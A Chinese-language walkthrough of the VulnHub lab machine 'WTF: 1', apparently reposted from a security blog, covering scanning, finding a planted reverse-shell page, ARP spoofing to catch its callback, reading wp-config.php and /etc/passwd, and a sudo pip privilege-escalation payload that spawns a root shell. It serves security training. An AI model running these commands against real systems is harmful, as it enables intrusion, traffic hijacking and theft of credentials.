虚拟机信息
虚拟机下载地址:https://www.vulnhub.com/entry/wtf-1,399/
虚拟机简介:初学者 - 中级机器,你的目标是阅读 /root/flag.txt
目标:1个flag
级别:中级
1、主机探测
1、通过netdiscover检测主机IP地址
arp-scan 192.168.207.0/24
2、服务探测
1、通过nmap进行端口扫描
nmap -A -sS -sV -v -p- 192.168.207.139
查看开放22、80端口
3、渗透测试
3.1 WEB渗透
1.访问站点进行测试
没有发现有用信息
2.网站测试
nikto -host http://192.168.207.139
使用nikto和dirb均未发现有用信息
3.gobuter进行测试
# 安装渗透测试字典
apt -y install seclists
apt install gobuster
gobuster dir --url http://192.168.207.143/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
发现zhkh目录文件
4.访问目录测试
打开站点访问比较慢,需要等一会才能加载出来
5.使用nikto进行测试
nikto -host http://192.168.207.143/zhkh
发现测试站点为WordPress,并且发现有上传目录
6.访问上传目录
http://192.168.207.143/zhkh/wp-content/uploads/uigen_2019/
在uigen_2019目录中发现有一个shell.php文件
7.访问shell.php页面
发现页面提示报错信息
根据报错信息进行查找,发现为metasploitable的反弹shell
8.访问页面并尝试抓包
发现192.168.207.143有连接到192.168.1.14的TCP 5555端口
9.Kali配置欺骗环境
在kali中添加一个IP地址
ip addr add 192.168.1.14/24 dev eth0
开启端口转发
echo 1 > /proc/sys/net/ipv4/ip_forward
10.使用arp欺骗攻击
kali开启端口监听TCP 5555端口
开启ARP欺骗攻击
arpspoof -i eth0 -t 192.168.207.143 192.168.207.2
# 192.168.207.143为靶机IP地址
# 192.168.207.2 为靶机网关地址
由于反弹shell连接时,发起请求的源IP地址为靶机IP地址192.168.207.143,访问的目的地址为192.168.1.14与靶机非同网段,需要欺骗靶机伪造虚拟网关MAC把跨网段流量转发给Kali
11.访问shell.php
访问shell.php后获取到反弹shell连接
3.2 主机渗透
1.进入网站目录
cd /var/www/html/zhkh
查看网站配置信息,WordPress配置文件在wp-config.php中
2.查看配置文件
cat wp-config.php
在配置文件最下方有一个注释内容
3.查看本地用户
cat /etc/passwd
查看ra用户具有登录权限
4.切换用户
尝试以ra用户,密码为`Db]f{He3HgO`(z登录成功
5.查看用户sudo权限
sudo -l
6.通过pip进行提权
提权参考:https://gtfobins.github.io/gtfobins/pip/
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF
7.查看flag信息
cat /root/flag.txt
原文始发于微信公众号(安全孺子牛):OSCP难度靶机之WTF: 1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论